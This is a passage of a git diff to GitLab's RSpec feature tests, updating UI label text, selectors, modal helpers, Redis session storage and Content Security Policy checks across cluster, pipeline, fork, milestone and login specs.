@@ -44,8 +44,17 @@ RSpec.describe 'ClusterAgents', :js do visit project_cluster_agent_path(project, agent.name) end - it 'displays agent and token information', :aggregate_failures do + it 'displays agent information', :aggregate_failures do expect(page).to have_content(agent.name) + end + + it 'displays agent activity tab', :aggregate_failures do + expect(page).to have_content('Activity') + end + + it 'displays agent tokens tab', :aggregate_failures do + expect(page).to have_content('Access tokens') + click_link 'Access tokens' expect(page).to have_content(token.description) end end diff --git a/spec/features/projects/clusters/eks_spec.rb b/spec/features/projects/clusters/eks_spec.rb index 09c10c0b3a9..a925e3a72f8 100644 --- a/spec/features/projects/clusters/eks_spec.rb +++ b/spec/features/projects/clusters/eks_spec.rb @@ -19,7 +19,7 @@ RSpec.describe 'AWS EKS Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' end diff --git a/spec/features/projects/clusters/gcp_spec.rb b/spec/features/projects/clusters/gcp_spec.rb index e1659cd2fbf..6e88cbf52b5 100644 --- a/spec/features/projects/clusters/gcp_spec.rb +++ b/spec/features/projects/clusters/gcp_spec.rb @@ -33,7 +33,7 @@ RSpec.describe 'Gcp Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' click_link 'Create new cluster' click_link 'Google GKE' @@ -49,7 +49,8 @@ RSpec.describe 'Gcp Cluster', :js do before do allow_any_instance_of(GoogleApi::CloudPlatform::Client) .to receive(:projects_zones_clusters_create) do - OpenStruct.new( + double( + 'cluster', self_link: 'projects/gcp-project-12345/zones/us-central1-a/operations/ope-123', status: 'RUNNING' ) @@ -144,9 +145,9 @@ RSpec.describe 'Gcp Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_button(class: 'dropdown-toggle-split') - click_link 'Connect with certificate' + click_link 'Connect with a certificate' end it 'user sees the "Environment scope" field' do @@ -160,7 +161,7 @@ RSpec.describe 'Gcp Cluster', :js do click_button 'Remove integration and resources' fill_in 'confirm_cluster_name_input', with: cluster.name click_button 'Remove integration' - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees creation form with the successful message' do @@ -174,7 +175,7 @@ RSpec.describe 'Gcp Cluster', :js do context 'when user has not dismissed GCP signup offer' do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees offer on cluster index page' do @@ -191,7 +192,7 @@ RSpec.describe 'Gcp Cluster', :js do context 'when user has dismissed GCP signup offer' do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'user does not see offer after dismissing' do diff --git a/spec/features/projects/clusters/user_spec.rb b/spec/features/projects/clusters/user_spec.rb index d3f709bfb53..d9887ea4fe0 100644 --- a/spec/features/projects/clusters/user_spec.rb +++ b/spec/features/projects/clusters/user_spec.rb @@ -25,7 +25,7 @@ RSpec.describe 'User Cluster', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' click_link 'Connect existing cluster' end @@ -113,7 +113,7 @@ RSpec.describe 'User Cluster', :js do click_button 'Remove integration and resources' fill_in 'confirm_cluster_name_input', with: cluster.name click_button 'Remove integration' - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees creation form with the successful message' do diff --git a/spec/features/projects/clusters_spec.rb b/spec/features/projects/clusters_spec.rb index a49fa4c9e31..6e45529c659 100644 --- a/spec/features/projects/clusters_spec.rb +++ b/spec/features/projects/clusters_spec.rb @@ -10,13 +10,13 @@ RSpec.describe 'Clusters', :js do before do project.add_maintainer(user) - gitlab_sign_in(user) + sign_in(user) end context 'when user does not have a cluster and visits cluster index page' do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'sees empty state' do @@ -34,17 +34,17 @@ RSpec.describe 'Clusters', :js do before do create(:cluster, :provided_by_user, name: 'default-cluster', environment_scope: '*', projects: [project]) visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_button(class: 'dropdown-toggle-split') end it 'user sees an add cluster button' do - expect(page).to have_content('Connect with certificate') + expect(page).to have_content('Connect with a certificate') end context 'when user filled form with environment scope' do before do - click_link 'Connect with certificate' + click_link 'Connect with a certificate' fill_in 'cluster_name', with: 'staging-cluster' fill_in 'cluster_environment_scope', with: 'staging/*' click_button 'Add Kubernetes cluster' @@ -72,7 +72,7 @@ RSpec.describe 'Clusters', :js do context 'when user updates duplicated environment scope' do before do - click_link 'Connect with certificate' + click_link 'Connect with a certificate' fill_in 'cluster_name', with: 'staging-cluster' fill_in 'cluster_environment_scope', with: '*' fill_in 'cluster_platform_kubernetes_attributes_api_url', with: 'https://0.0.0.0' @@ -109,13 +109,13 @@ RSpec.describe 'Clusters', :js do create(:cluster, :provided_by_gcp, name: 'default-cluster', environment_scope: '*', projects: [project]) visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end context 'when user filled form with environment scope' do before do click_button(class: 'dropdown-toggle-split') - click_link 'Create new cluster' + click_link 'Create a new cluster' click_link 'Google GKE' sleep 2 # wait for ajax @@ -160,7 +160,7 @@ RSpec.describe 'Clusters', :js do context 'when user updates duplicated environment scope' do before do click_button(class: 'dropdown-toggle-split') - click_link 'Create new cluster' + click_link 'Create a new cluster' click_link 'Google GKE' sleep 2 # wait for ajax @@ -190,7 +190,7 @@ RSpec.describe 'Clusters', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' end it 'user sees a table with one cluster' do @@ -213,7 +213,7 @@ RSpec.describe 'Clusters', :js do before do visit project_clusters_path(project) - click_link 'Certificate based' + click_link 'Certificate' click_link 'Connect with a certificate' click_link 'Create new cluster' end diff --git a/spec/features/projects/container_registry_spec.rb b/spec/features/projects/container_registry_spec.rb index eec50c3a66a..4ebcb69592b 100644 --- a/spec/features/projects/container_registry_spec.rb +++ b/spec/features/projects/container_registry_spec.rb @@ -87,7 +87,7 @@ RSpec.describe 'Container Registry', :js do end it 'shows the image tags' do - expect(page).to have_content 'Image tags' + expect(page).to have_content '20 tags' first_tag = first('[data-testid="name"]') expect(first_tag).to have_content '1' end diff --git a/spec/features/projects/files/user_creates_files_spec.rb b/spec/features/projects/files/user_creates_files_spec.rb index fd83547d064..7159418deda 100644 --- a/spec/features/projects/files/user_creates_files_spec.rb +++ b/spec/features/projects/files/user_creates_files_spec.rb @@ -170,7 +170,7 @@ RSpec.describe 'Projects > Files > User creates files', :js do end it 'shows a message saying the file will be committed in a fork' do - message = "A new branch will be created in your fork and a new merge request will be started." + message = "GitLab will create a branch in your fork and start a merge request." expect(page).to have_content(message) end diff --git a/spec/features/projects/fork_spec.rb b/spec/features/projects/fork_spec.rb index 69e4303cce7..f9a6b67e469 100644 --- a/spec/features/projects/fork_spec.rb +++ b/spec/features/projects/fork_spec.rb @@ -59,10 +59,11 @@ RSpec.describe 'Project fork' do context 'forking is disabled' do let(:forking_access_level) { ProjectFeature::DISABLED } - it 'does not render fork button' do + it 'render a disabled fork button' do visit project_path(project) - expect(page).not_to have_css('a', text: 'Fork') + expect(page).to have_css('a.disabled', text: 'Fork') + expect(page).to have_css('a.count', text: '0') end it 'does not render new project fork page' do @@ -80,10 +81,11 @@ RSpec.describe 'Project fork' do end context 'user is not a team member' do - it 'does not render fork button' do + it 'render a disabled fork button' do visit project_path(project) - expect(page).not_to have_css('a', text: 'Fork') + expect(page).to have_css('a.disabled', text: 'Fork') + expect(page).to have_css('a.count', text: '0') end it 'does not render new project fork page' do @@ -102,6 +104,7 @@ RSpec.describe 'Project fork' do visit project_path(project) expect(page).to have_css('a', text: 'Fork') + expect(page).to have_css('a.count', text: '0') expect(page).not_to have_css('a.disabled', text: 'Fork') end diff --git a/spec/features/projects/integrations/user_activates_jira_spec.rb b/spec/features/projects/integrations/user_activates_jira_spec.rb index d7679d38cae..7a035248440 100644 --- a/spec/features/projects/integrations/user_activates_jira_spec.rb +++ b/spec/features/projects/integrations/user_activates_jira_spec.rb @@ -26,8 +26,7 @@ RSpec.describe 'User activates Jira', :js do unless Gitlab.ee? it 'adds Jira link to sidebar menu' do page.within('.nav-sidebar') do - expect(page).not_to have_link('Jira Issues') - expect(page).not_to have_link('Issue List', visible: false) + expect(page).not_to have_link('Jira issues', visible: false) expect(page).not_to have_link('Open Jira', href: url, visible: false) expect(page).to have_link('Jira', href: url) end diff --git a/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb b/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb index bfa7be5bb5c..211576a93f3 100644 --- a/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb +++ b/spec/features/projects/issues/design_management/user_uploads_designs_spec.rb @@ -10,6 +10,9 @@ RSpec.describe 'User uploads new design', :js do let(:issue) { create(:issue, project: project) } before do + # Cause of raising query limiting threshold https://gitlab.com/gitlab-org/gitlab/-/issues/347334 + stub_const("Gitlab::QueryLimiting::Transaction::THRESHOLD", 102) + sign_in(user) enable_design_management(feature_enabled) visit project_issue_path(project, issue) @@ -27,10 +30,10 @@ RSpec.describe 'User uploads new design', :js do expect(page).to have_content('dk.png') end - upload_design(gif_fixture, count: 2) + upload_design([gif_fixture, logo_svg_fixture, big_image_fixture], count: 4) - expect(page).to have_selector('.js-design-list-item', count: 2) - expect(page.all('.js-design-list-item').map(&:text)).to eq(['dk.png', 'banana_sample.gif']) + expect(page).to have_selector('.js-design-list-item', count: 4) + expect(page.all('.js-design-list-item').map(&:text)).to eq(['dk.png', 'banana_sample.gif', 'logo_sample.svg', 'big-image.png']) end end @@ -50,8 +53,16 @@ RSpec.describe 'User uploads new design', :js do Rails.root.join('spec', 'fixtures', 'banana_sample.gif') end - def upload_design(fixture, count:) - attach_file(:upload_file, fixture, match: :first, make_visible: true) + def logo_svg_fixture + Rails.root.join('spec', 'fixtures', 'logo_sample.svg') + end + + def big_image_fixture + Rails.root.join('spec', 'fixtures', 'big-image.png') + end + + def upload_design(fixtures, count:) + attach_file(:upload_file, fixtures, multiple: true, match: :first, make_visible: true) wait_for('designs uploaded') do issue.reload.designs.count == count diff --git a/spec/features/projects/jobs/user_browses_jobs_spec.rb b/spec/features/projects/jobs/user_browses_jobs_spec.rb index 8538b894869..a47aab1ec70 100644 --- a/spec/features/projects/jobs/user_browses_jobs_spec.rb +++ b/spec/features/projects/jobs/user_browses_jobs_spec.rb @@ -181,7 +181,7 @@ RSpec.describe 'User browses jobs' do name: 'rspec tests', stage: 'test') - create(:ci_job_artifact, :codequality, job: build) + create(:ci_job_artifact, :archive, job: build) end before do diff --git a/spec/features/projects/labels/issues_sorted_by_priority_spec.rb b/spec/features/projects/labels/issues_sorted_by_priority_spec.rb index 4a25e28a14e..91a30004fc3 100644 --- a/spec/features/projects/labels/issues_sorted_by_priority_spec.rb +++ b/spec/features/projects/labels/issues_sorted_by_priority_spec.rb @@ -80,7 +80,7 @@ RSpec.describe 'Issue prioritization' do expect(issue_titles[0..1]).to contain_exactly('issue_5', 'issue_8') expect(issue_titles[2..4]).to contain_exactly('issue_1', 'issue_3', 'issue_7') - expect(issue_titles[5..-1]).to eq(%w(issue_2 issue_4 issue_6)) + expect(issue_titles[5..]).to eq(%w(issue_2 issue_4 issue_6)) end end end diff --git a/spec/features/projects/members/groups_with_access_list_spec.rb b/spec/features/projects/members/groups_with_access_list_spec.rb index eb32570448b..6adc3503492 100644 --- a/spec/features/projects/members/groups_with_access_list_spec.rb +++ b/spec/features/projects/members/groups_with_access_list_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe 'Projects > Members > Groups with access list', :js do include Spec::Support::Helpers::Features::MembersHelpers + include Spec::Support::Helpers::ModalHelpers let_it_be(:user) { create(:user) } let_it_be(:group) { create(:group, :public) } @@ -70,7 +71,7 @@ RSpec.describe 'Projects > Members > Groups with access list', :js do click_button 'Remove group' end - page.within('[role="dialog"]') do + within_modal do click_button('Remove group') end diff --git a/spec/features/projects/members/list_spec.rb b/spec/features/projects/members/list_spec.rb index 308098c72a1..f2424a4acc3 100644 --- a/spec/features/projects/members/list_spec.rb +++ b/spec/features/projects/members/list_spec.rb @@ -5,6 +5,7 @@ require 'spec_helper' RSpec.describe 'Project members list', :js do include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper + include Spec::Support::Helpers::ModalHelpers let_it_be(:user1) { create(:user, name: 'John Doe') } let_it_be(:user2) { create(:user, name: 'Mary Jane') } @@ -93,7 +94,7 @@ RSpec.describe 'Project members list', :js do click_button 'Remove member' end - page.within('[role="dialog"]') do + within_modal do expect(page).to have_unchecked_field 'Also unassign this user from related issues and merge requests' click_button('Remove member') end diff --git a/spec/features/projects/milestones/milestone_spec.rb b/spec/features/projects/milestones/milestone_spec.rb index 9ffb1746f3e..6bd139c0ebe 100644 --- a/spec/features/projects/milestones/milestone_spec.rb +++ b/spec/features/projects/milestones/milestone_spec.rb @@ -2,10 +2,11 @@ require 'spec_helper' -RSpec.describe 'Project milestone' do +RSpec.describe 'Project milestone', :js do let(:user) { create(:user) } let(:project) { create(:project, name: 'test', namespace: user.namespace) } let(:milestone) { create(:milestone, project: project) } + let(:active_tab_selector) { '[role="tab"][aria-selected="true"]' } def toggle_sidebar find('.milestone-sidebar .gutter-toggle').click @@ -31,8 +32,9 @@ RSpec.describe 'Project milestone' do it 'shows issues tab' do within('#content-body') do expect(page).to have_link 'Issues', href: '#tab-issues' - expect(page).to have_selector '.nav-links li a.active', count: 1 - expect(find('.nav-links li a.active')).to have_content 'Issues' + expect(page).to have_selector active_tab_selector, count: 1 + expect(find(active_tab_selector)).to have_content 'Issues' + expect(page).to have_text('Unstarted Issues') end end @@ -49,6 +51,35 @@ RSpec.describe 'Project milestone' do end end + context 'when clicking on other tabs' do + using RSpec::Parameterized::TableSyntax + + where(:tab_text, :href, :panel_content) do + 'Merge requests' | '#tab-merge-requests' | 'Work in progress' + 'Participants' | '#tab-participants' | nil + 'Labels' | '#tab-labels' | nil + end + + with_them do + before do + visit project_milestone_path(project, milestone) + click_link(tab_text, href: href) + end + + it 'shows the merge requests tab and panel' do + within('#content-body') do + expect(find(active_tab_selector)).to have_content tab_text + expect(find(href)).to be_visible + expect(page).to have_text(panel_content) if panel_content + end + end + + it 'sets the location hash' do + expect(current_url).to end_with(href) + end + end + end + context 'when project has disabled issues' do before do create(:issue, project: project, milestone: milestone) @@ -59,7 +90,7 @@ RSpec.describe 'Project milestone' do it 'does not show any issues under the issues tab' do within('#content-body') do - expect(find('.nav-links li a.active')).to have_content 'Issues' + expect(find(active_tab_selector)).to have_content 'Issues' expect(page).not_to have_selector '.issuable-row' end end diff --git a/spec/features/projects/pages/user_adds_domain_spec.rb b/spec/features/projects/pages/user_adds_domain_spec.rb index 06f130ae69c..bd4cb1aa39b 100644 --- a/spec/features/projects/pages/user_adds_domain_spec.rb +++ b/spec/features/projects/pages/user_adds_domain_spec.rb @@ -177,11 +177,11 @@ RSpec.describe 'User adds pages domain', :js do expect(domain.key).to be_nil end - it 'shows the DNS CNAME record' do + it 'shows the DNS ALIAS record' do visit project_pages_path(project) within('#content-body') { click_link 'Edit' } - expect(page).to have_field :domain_dns, with: "#{domain.domain} CNAME #{domain.project.pages_subdomain}.#{Settings.pages.host}." + expect(page).to have_field :domain_dns, with: "#{domain.domain} ALIAS #{domain.project.pages_subdomain}.#{Settings.pages.host}." end end end diff --git a/spec/features/projects/pipeline_schedules_spec.rb b/spec/features/projects/pipeline_schedules_spec.rb index 9df430c0f78..aae5ab58b5d 100644 --- a/spec/features/projects/pipeline_schedules_spec.rb +++ b/spec/features/projects/pipeline_schedules_spec.rb @@ -42,7 +42,7 @@ RSpec.describe 'Pipeline Schedules', :js do click_link 'Take ownership' page.within('.pipeline-schedule-table-row') do expect(page).not_to have_content('No owner') - expect(page).to have_link('John Doe') + expect(page).to have_link('Sidney Jones') end end diff --git a/spec/features/projects/pipelines/pipeline_spec.rb b/spec/features/projects/pipelines/pipeline_spec.rb index 944cee2a998..6ddc8e43762 100644 --- a/spec/features/projects/pipelines/pipeline_spec.rb +++ b/spec/features/projects/pipelines/pipeline_spec.rb @@ -53,6 +53,7 @@ RSpec.describe 'Pipeline', :js do pipeline: pipeline, name: 'jenkins', stage: 'external', + ref: 'master', target_url: 'http://gitlab.com/status') end end @@ -915,7 +916,7 @@ RSpec.describe 'Pipeline', :js do end end - describe 'GET /:project/-/pipelines/:id/builds' do + describe 'GET /:project/-/pipelines/:id/builds with jobs_tab_vue feature flag turned off' do include_context 'pipeline builds' let_it_be(:project) { create(:project, :repository) } @@ -923,6 +924,7 @@ RSpec.describe 'Pipeline', :js do let(:pipeline) { create(:ci_pipeline, project: project, ref: 'master', sha: project.commit.id) } before do + stub_feature_flags(jobs_tab_vue: false) visit builds_project_pipeline_path(project, pipeline) end diff --git a/spec/features/projects/pipelines/pipelines_spec.rb b/spec/features/projects/pipelines/pipelines_spec.rb index e38c4989f26..fb45db213d0 100644 --- a/spec/features/projects/pipelines/pipelines_spec.rb +++ b/spec/features/projects/pipelines/pipelines_spec.rb @@ -625,7 +625,7 @@ RSpec.describe 'Pipelines', :js do create_build('test', 1, 'audit', :created) create_build('deploy', 2, 'production', :created) - create(:generic_commit_status, pipeline: pipeline, stage: 'external', name: 'jenkins', stage_idx: 3) + create(:generic_commit_status, pipeline: pipeline, stage: 'external', name: 'jenkins', stage_idx: 3, ref: 'master') visit project_pipeline_path(project, pipeline) wait_for_requests diff --git a/spec/features/projects/settings/forked_project_settings_spec.rb b/spec/features/projects/settings/forked_project_settings_spec.rb index a84516e19f9..04fb6953b51 100644 --- a/spec/features/projects/settings/forked_project_settings_spec.rb +++ b/spec/features/projects/settings/forked_project_settings_spec.rb @@ -15,7 +15,7 @@ RSpec.describe 'Projects > Settings > For a forked project', :js do end shared_examples 'project settings for a forked projects' do - it 'allows deleting the link to the forked project', quarantine: 'https://gitlab.com/gitlab-org/gitlab/-/issues/327817' do + it 'allows deleting the link to the forked project' do visit edit_project_path(forked_project) click_button 'Remove fork relationship' diff --git a/spec/features/projects/settings/user_manages_project_members_spec.rb b/spec/features/projects/settings/user_manages_project_members_spec.rb index 02a634a0fcc..31dc939e6b8 100644 --- a/spec/features/projects/settings/user_manages_project_members_spec.rb +++ b/spec/features/projects/settings/user_manages_project_members_spec.rb @@ -5,6 +5,7 @@ require 'spec_helper' RSpec.describe 'Projects > Settings > User manages project members' do include Spec::Support::Helpers::Features::MembersHelpers include Select2Helper + include Spec::Support::Helpers::ModalHelpers let(:group) { create(:group, name: 'OpenSource') } let(:project) { create(:project) } @@ -26,7 +27,7 @@ RSpec.describe 'Projects > Settings > User manages project members' do click_button 'Remove member' end - page.within('[role="dialog"]') do + within_modal do expect(page).to have_unchecked_field 'Also unassign this user from related issues and merge requests' click_button('Remove member') end diff --git a/spec/features/projects/settings/user_transfers_a_project_spec.rb b/spec/features/projects/settings/user_transfers_a_project_spec.rb index ba4c379ef0a..a88b9101869 100644 --- a/spec/features/projects/settings/user_transfers_a_project_spec.rb +++ b/spec/features/projects/settings/user_transfers_a_project_spec.rb @@ -8,6 +8,8 @@ RSpec.describe 'Projects > Settings > User transfers a project', :js do let(:group) { create(:group) } before do + stub_const('Gitlab::QueryLimiting::Transaction::THRESHOLD', 120) + group.add_owner(user) sign_in(user) end @@ -16,10 +18,12 @@ RSpec.describe 'Projects > Settings > User transfers a project', :js do visit edit_project_path(project) page.within('.js-project-transfer-form') do - page.find('.select2-container').click + page.find('[data-testid="transfer-project-namespace"]').click end - page.find("div[role='option']", text: group.full_name).click + page.within('[data-testid="transfer-project-namespace"]') do + page.find("li button", text: group.full_name).click + end click_button('Transfer project') diff --git a/spec/features/projects/sourcegraph_csp_spec.rb b/spec/features/projects/sourcegraph_csp_spec.rb index 25d27462aa9..10dd050e8cc 100644 --- a/spec/features/projects/sourcegraph_csp_spec.rb +++ b/spec/features/projects/sourcegraph_csp_spec.rb @@ -13,7 +13,8 @@ RSpec.describe 'Sourcegraph Content Security Policy' do end it_behaves_like 'setting CSP', 'connect-src' do - let_it_be(:whitelisted_url) { 'https://sourcegraph.test' } + let_it_be(:sourcegraph_url) { 'https://sourcegraph.test' } + let_it_be(:allowlisted_url) { "#{sourcegraph_url}/.api/" } let_it_be(:extended_controller_class) { Projects::BlobController } subject do @@ -23,7 +24,7 @@ RSpec.describe 'Sourcegraph Content Security Policy' do end before do - allow(Gitlab::CurrentSettings).to receive(:sourcegraph_url).and_return(whitelisted_url) + allow(Gitlab::CurrentSettings).to receive(:sourcegraph_url).and_return(sourcegraph_url) allow(Gitlab::CurrentSettings).to receive(:sourcegraph_enabled).and_return(true) sign_in(user) diff --git a/spec/features/projects/tags/user_edits_tags_spec.rb b/spec/features/projects/tags/user_edits_tags_spec.rb index 9f66b7274e8..17080043b6d 100644 --- a/spec/features/projects/tags/user_edits_tags_spec.rb +++ b/spec/features/projects/tags/user_edits_tags_spec.rb @@ -21,7 +21,8 @@ RSpec.describe 'Project > Tags', :js do context 'page with tags list' do it 'shows tag name' do - expect(page).to have_content 'v1.1.0 Version 1.1.0' + expect(page).to have_content 'v1.1.0' + expect(page).to have_content 'Version 1.1.0' end it 'shows tag edit button' do diff --git a/spec/features/projects/user_creates_project_spec.rb b/spec/features/projects/user_creates_project_spec.rb index f5e8a5e8fc1..17c65e645f4 100644 --- a/spec/features/projects/user_creates_project_spec.rb +++ b/spec/features/projects/user_creates_project_spec.rb @@ -56,6 +56,31 @@ RSpec.describe 'User creates a project', :js do expect(page).to have_content('README.md Initial commit') end + it 'allows creating a new project when the new_project_sast_enabled is assigned the unchecked candidate' do + stub_experiments(new_project_sast_enabled: 'unchecked_candidate') + + visit(new_project_path) + + click_link 'Create blank project' + fill_in(:project_name, with: 'With initial commits') + + expect(page).to have_checked_field 'Initialize repository with a README' + expect(page).to have_unchecked_field 'Enable Static Application Security Testing (SAST)' + + check 'Enable Static Application Security Testing (SAST)' + + page.within('#content-body') do + click_button('Create project') + end + + project = Project.last + + expect(current_path).to eq(project_path(project)) + expect(page).to have_content('With initial commits') + expect(page).to have_content('Configure SAST in `.gitlab-ci.yml`, creating this file if it does not already exist') + expect(page).to have_content('README.md Initial commit') + end + context 'in a subgroup they do not own' do let(:parent) { create(:group) } let!(:subgroup) { create(:group, parent: parent) } diff --git a/spec/features/search/user_searches_for_code_spec.rb b/spec/features/search/user_searches_for_code_spec.rb index ef7af0ba138..c04a4493a9b 100644 --- a/spec/features/search/user_searches_for_code_spec.rb +++ b/spec/features/search/user_searches_for_code_spec.rb @@ -40,14 +40,24 @@ RSpec.describe 'User searches for code' do include_examples 'top right search form' include_examples 'search timeouts', 'blobs' - it 'finds code' do + it 'finds code and links to blob' do fill_in('dashboard_search', with: 'rspec') find('.btn-search').click expect(page).to have_selector('.results', text: 'Update capybara, rspec-rails, poltergeist to recent versions') - find("#L3").click - expect(current_url).to match(%r{master/.gitignore#L3}) + find("#blob-L3").click + expect(current_url).to match(%r{blob/master/.gitignore#L3}) + end + + it 'finds code and links to blame' do + fill_in('dashboard_search', with: 'rspec') + find('.btn-search').click + + expect(page).to have_selector('.results', text: 'Update capybara, rspec-rails, poltergeist to recent versions') + + find("#blame-L3").click + expect(current_url).to match(%r{blame/master/.gitignore#L3}) end it 'search mutiple words with refs switching' do @@ -65,7 +75,8 @@ RSpec.describe 'User searches for code' do expect(page).to have_selector('.results', text: expected_result) expect(find_field('dashboard_search').value).to eq(search) - expect(find("#L1502")[:href]).to match(%r{v1.0.0/files/markdown/ruby-style-guide.md#L1502}) + expect(find("#blob-L1502")[:href]).to match(%r{blob/v1.0.0/files/markdown/ruby-style-guide.md#L1502}) + expect(find("#blame-L1502")[:href]).to match(%r{blame/v1.0.0/files/markdown/ruby-style-guide.md#L1502}) end end diff --git a/spec/features/snippets/user_snippets_spec.rb b/spec/features/snippets/user_snippets_spec.rb index fe39208213a..bb733431b22 100644 --- a/spec/features/snippets/user_snippets_spec.rb +++ b/spec/features/snippets/user_snippets_spec.rb @@ -20,7 +20,7 @@ RSpec.describe 'User Snippets' do end it 'view my public snippets' do - page.within('.snippet-scope-menu') do + page.within('.js-snippets-nav-tabs') do click_link "Public" end @@ -30,7 +30,7 @@ RSpec.describe 'User Snippets' do end it 'view my internal snippets' do - page.within('.snippet-scope-menu') do + page.within('.js-snippets-nav-tabs') do click_link "Internal" end @@ -40,7 +40,7 @@ RSpec.describe 'User Snippets' do end it 'view my private snippets' do - page.within('.snippet-scope-menu') do + page.within('.js-snippets-nav-tabs') do click_link "Private" end diff --git a/spec/features/users/active_sessions_spec.rb b/spec/features/users/active_sessions_spec.rb index fab9f0884ae..6dc93fe017f 100644 --- a/spec/features/users/active_sessions_spec.rb +++ b/spec/features/users/active_sessions_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe 'Active user sessions', :clean_gitlab_redis_shared_state do +RSpec.describe 'Active user sessions', :clean_gitlab_redis_sessions do it 'successful login adds a new active user login' do now = Time.zone.parse('2018-03-12 09:06') Timecop.freeze(now) do @@ -29,13 +29,13 @@ RSpec.describe 'Active user sessions', :clean_gitlab_redis_shared_state do it 'successful login cleans up obsolete entries' do user = create(:user) - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.sadd("session:lookup:user:gitlab:#{user.id}", '59822c7d9fcdfa03725eff41782ad97d') end gitlab_sign_in(user) - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).not_to include '59822c7d9fcdfa03725eff41782ad97d' end end @@ -44,14 +44,14 @@ RSpec.describe 'Active user sessions', :clean_gitlab_redis_shared_state do user = create(:user) personal_access_token = create(:personal_access_token, user: user) - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.sadd("session:lookup:user:gitlab:#{user.id}", '59822c7d9fcdfa03725eff41782ad97d') end visit user_path(user, :atom, private_token: personal_access_token.token) expect(page.status_code).to eq 200 - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).to include '59822c7d9fcdfa03725eff41782ad97d' end end diff --git a/spec/features/users/login_spec.rb b/spec/features/users/login_spec.rb index 66ebd00d368..7ef11194ff9 100644 --- a/spec/features/users/login_spec.rb +++ b/spec/features/users/login_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe 'Login', :clean_gitlab_redis_shared_state do +RSpec.describe 'Login', :clean_gitlab_redis_sessions do include TermsHelper include UserLoginHelper include SessionHelpers @@ -84,7 +84,7 @@ RSpec.describe 'Login', :clean_gitlab_redis_shared_state do expect(page).to have_content('Your account has been blocked.') end - it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do + it 'does not update Devise trackable attributes' do expect(authentication_metrics) .to increment(:user_blocked_counter) .and increment(:user_unauthenticated_counter) @@ -161,7 +161,7 @@ RSpec.describe 'Login', :clean_gitlab_redis_shared_state do expect(page).to have_content('Invalid login or password.') end - it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do + it 'does not update Devise trackable attributes' do expect(authentication_metrics) .to increment(:user_unauthenticated_counter) .and increment(:user_password_invalid_counter) diff --git a/spec/features/users/one_trust_csp_spec.rb b/spec/features/users/one_trust_csp_spec.rb new file mode 100644 index 00000000000..382a0b4be6c --- /dev/null +++ b/spec/features/users/one_trust_csp_spec.rb @@ -0,0 +1,17 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'OneTrust content security policy' do + let(:user) { create(:user) } + + before do + stub_config(extra: { one_trust_id: SecureRandom.uuid }) + end + + it 'has proper Content Security Policy headers' do + visit root_path + + expect(response_headers['Content-Security-Policy']).to include('https://cdn.cookielaw.org https://*.onetrust.com') + end +end diff --git a/spec/features/users/show_spec.rb b/spec/features/users/show_spec.rb index 61672662fbe..8edbf639c81 100644 --- a/spec/features/users/show_spec.rb +++ b/spec/features/users/show_spec.rb @@ -207,34 +207,31 @@ RSpec.describe 'User page' do state: :blocked, organization: 'GitLab - work info test', job_title: 'Frontend Engineer', - pronunciation: 'pruh-nuhn-see-ay-shn' + pronunciation: 'pruh-nuhn-see-ay-shn', + bio: 'My personal bio' ) end let_it_be(:status) { create(:user_status, user: user, message: "Working hard!") } - it 'shows no tab' do - subject + before do + visit_profile + end + it 'shows no tab' do expect(page).to have_css("div.profile-header") expect(page).not_to have_css("ul.nav-links") end it 'shows blocked message' do - subject - expect(page).to have_content("This user is blocked") end it 'shows user name as blocked' do - subject - expect(page).to have_css(".cover-title", text: 'Blocked user') end it 'shows no additional fields' do - subject - expect(page).not_to have_css(".profile-user-bio") expect(page).not_to have_content('GitLab - work info test') expect(page).not_to have_content('Frontend Engineer') @@ -243,10 +240,10 @@ RSpec.describe 'User page' do end it 'shows username' do - subject - expect(page).to have_content("@#{user.username}") end + + it_behaves_like 'default brand title page meta description' end context 'with unconfirmed user' do @@ -256,7 +253,8 @@ RSpec.describe 'User page' do :unconfirmed, organization: 'GitLab - work info test', job_title: 'Frontend Engineer', - pronunciation: 'pruh-nuhn-see-ay-shn' + pronunciation: 'pruh-nuhn-see-ay-shn', + bio: 'My personal bio' ) end @@ -287,6 +285,8 @@ RSpec.describe 'User page' do it 'shows private profile message' do expect(page).to have_content("This user has a private profile") end + + it_behaves_like 'default brand title page meta description' end context 'when visited by an authenticated user' do diff --git a/spec/features/webauthn_spec.rb b/spec/features/webauthn_spec.rb index 4eebc9d2c1e..215d1ff1cb6 100644 --- a/spec/features/webauthn_spec.rb +++ b/spec/features/webauthn_spec.rb @@ -113,124 +113,94 @@ RSpec.describe 'Using WebAuthn Devices for Authentication', :js do describe 'authentication' do 